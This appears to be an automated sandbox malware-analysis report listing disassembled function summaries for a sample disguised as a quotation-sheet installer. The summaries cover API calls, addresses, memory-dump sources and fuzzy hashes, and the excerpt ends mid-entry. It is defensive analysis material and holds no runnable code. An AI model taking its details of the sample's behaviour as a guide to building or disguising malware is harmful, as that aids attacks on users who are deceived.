                                                                                • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                • Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
                                                                                • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                • Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040EF1E,0040A8D8,00403164,0040A8D8,0040EF1E,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                • Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
                                                                                • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                • Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                APIs
                                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 6ba3a5c734e985ed629f10114e2f019316f9f8eb369504b12af0ad305adee80a
                                                                                • Instruction ID: 83084666205c60dee55275756f9b5a6509ae601666284ef718d0d22824b4410c
                                                                                • Opcode Fuzzy Hash: 6ba3a5c734e985ed629f10114e2f019316f9f8eb369504b12af0ad305adee80a
                                                                                • Instruction Fuzzy Hash: DCD01277B14100ABDB10EBA49A08A9E77A5AB60329B308637D201F21D1D6B9CA559A29
                                                                                APIs
                                                                                • SetDlgItemTextA.USER32(?,?,00000000), ref: 00404062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ItemText
                                                                                • String ID:
                                                                                • API String ID: 3367045223-0
                                                                                • Opcode ID: e9fac022f5a56b095fb31f9536c058b792927055fb4936a4566be794776724c6
                                                                                • Instruction ID: e527cde694e4746e823f20d7cbf8bde5da20a15a663149da90d8392309f3eb92
                                                                                • Opcode Fuzzy Hash: e9fac022f5a56b095fb31f9536c058b792927055fb4936a4566be794776724c6
                                                                                • Instruction Fuzzy Hash: 88C04C75148640BFD741A755CC42F1FB799EF94315F40C92EB59CA11D1CA3686209E26
                                                                                APIs
                                                                                • SendMessageA.USER32(0001041E,00000000,00000000,00000000), ref: 004040A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                • Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
                                                                                • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                • Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D
                                                                                APIs
                                                                                • SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                                                                • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                                                                • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09
                                                                                APIs
                                                                                • CharNextA.USER32(?,00403316,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000020), ref: 0040590D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID:
                                                                                • API String ID: 3213498283-0
                                                                                • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                • Instruction ID: 09324d9f31138b4eeef2ff36d168370f127a0ca07da70518b642a67bd257cd6d
                                                                                • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                • Instruction Fuzzy Hash: AEC0806441C654D7C520571080345677FF1EAD1710F148856F0C463251C3346910DB7F
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                                                • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                                                • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00404E28
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                                                • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                                                • ShowWindow.USER32(00000000), ref: 00404FD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: d70745f7405b5c2a2dc974df1db2f438c32a092c31808a7ff24f4b3e7a673313
                                                                                • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                                                • Opcode Fuzzy Hash: d70745f7405b5c2a2dc974df1db2f438c32a092c31808a7ff24f4b3e7a673313
                                                                                • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                                                • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                                                • lstrcmpiA.KERNEL32(Call,ldreboligblokkene: Installing), ref: 004045ED
                                                                                • lstrcatA.KERNEL32(?,Call), ref: 004045F9
                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                                                  • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                                                  • Part of subcall function 004060CE: CharPrevA.USER32(?,?,75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                                                • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                                                  • Part of subcall function 0040483D: lstrlenA.KERNEL32(ldreboligblokkene: Installing,ldreboligblokkene: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                  • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                                                  • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,ldreboligblokkene: Installing), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$Call$ldreboligblokkene: Installing
                                                                                • API String ID: 2624150263-2820427717
                                                                                • Opcode ID: e37c6c9a1e4bb5c1d646026eaa914d30a29c7d8e35a995df9d5ec9a0e9ed0814
                                                                                • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                                                • Opcode Fuzzy Hash: e37c6c9a1e4bb5c1d646026eaa914d30a29c7d8e35a995df9d5ec9a0e9ed0814
                                                                                • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                                                APIs
                                                                                  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                • String ID:
                                                                                • API String ID: 4227406936-0
                                                                                • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 0040211D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
